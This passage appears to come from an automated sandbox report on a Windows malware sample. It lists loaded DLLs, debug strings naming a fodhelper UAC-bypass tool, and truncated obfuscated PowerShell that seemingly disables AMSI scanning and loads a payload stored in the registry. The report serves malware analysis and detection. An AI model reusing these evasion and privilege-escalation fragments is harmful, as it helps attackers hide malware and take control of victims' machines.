        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: C:\Windows\System32\fodhelper.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
        Source: e7WMhx18XN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: e7WMhx18XN.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
        Source: e7WMhx18XN.exeStatic file information: File size 8201216 > 1048576
        Source: e7WMhx18XN.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x7d1a00
        Source: e7WMhx18XN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1346529843.000000001C470000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp, FodhelperBypassUAC.exe, 0000000C.00000000.1323844842.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp, FodhelperBypassUAC.exe, 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
        Source: Binary string: /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: cwdC:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUACexeC:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.41.34120\bin\HostX64\x64\link.exepdbC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdbcmd /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: AC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_xfg_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\gs\amd64\amdsecgs.asmC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUAC\x64\Release\vc143.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($PQfPIIgelMLvUB,$ldjQKaGUcclhcmhFUiK).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$rcGSxwaaaaKUimwsu=$yNoIOiWMAQGoVU.Invoke
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+[Char](120)+'-'+[Char]
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($scqjgRcUiQSTBu,$ivpgsCMtihnowdNIBeH).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+'.d'+'l'+''+[Char](108)+'');$EVtyXOreozsddqFlq=$xRDavNIGnzLLon.Invoke($Null,@([Object]$s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAcc
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+'x
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($VQjNvPkAQyhVaI,$vKwAkflJKGpUwNhZmaw).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+'l');$ZjZDXRvDVpnzBqGGH=$ONnlOWkAfaUoGE.Invo
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+'r'+[Char](98)+''+'x'+'-'+[Char](115)+'t
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($ViSGjgKFWHOvJi,$LYPstsFMvGDueCuqqFR).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+'dll');$iERkOmaiRJGubWlVw=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$JKCdsPm,[Object
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'AR'+'E'+'').GetValue(''+'$'+''+[Char](114)+''+'b'+''+[Char](120)+''+'-'+''
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 